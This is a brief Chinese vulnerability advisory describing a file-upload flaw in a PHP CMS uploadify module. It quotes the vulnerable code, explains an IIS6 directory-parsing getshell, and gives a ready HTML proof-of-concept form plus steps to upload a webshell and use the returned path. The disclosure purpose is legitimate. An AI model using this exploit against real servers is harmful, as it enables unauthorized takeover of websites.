- 发布时间:2017-01-02
- 公开时间:N/A
- 漏洞类型:文件上传
- 危害等级:高
- 漏洞编号:xianzhi-2017-01-73318655
- 测试版本:N/A
漏洞详情
app/system/include/module/uploadify.class.php 65行
public function doupfile(){
global $M;
$this->upfile->set_upfile();
$info['savepath'] = $_M['form']['savepath'];
$info['format'] = $_M['form']['format'];
$info['maxsize'] = $_M['form']['maxsize'];
$info['is_rename'] = $_M['form']['is_rename'];
$info['is_overwrite'] = $_M['form']['is_overwrite'];
$this->set_upload($info);
$back = $this->upload($_M['form']['formname']);
if($_M['form']['type']==1){
if($back['error']){
$back['error'] = $back['errorcode'];
}else{
$backs['path'] = $back['path'];
$backs['append'] = 'false';
$back = $backs;
}
}
echo jsonencode($back);
}
$_M['form']来自$(POST|GET|COOKIE)
savepath可控导致且当目录不存在时自动新建 导致IIS6下解析漏洞getshell
测试方法
<form id="form" action="http://xxxxx.com/app/system/entrance.php?c=uploadify&a=doupfile" method="POST" enctype ="multipart/form-data">
savepath:<input type="text" name="savepath" value="1.asp"><br />
format:<input type="text" name="format" value="rar|zip|sql|doc|pdf|jpg|xls|png|gif|mp3|jpeg|bmp|swf|flv|ico"><br />
maxsize:<input type="text" name="maxsize" value="1111111111111111"><br />
is_rename:<input type="text" name="is_rename" value="0"><br />
is_overwrite:<input type="text" name="is_overwrite" value="1"><br />
formname:<input type="text" name="formname" value="file"><br />
<input type="file" name="file">
<input type="submit" value="submit">
</form>
<br />
选择一个后缀在上面列表中的马submit即可
返回带路径 直接用
view.png
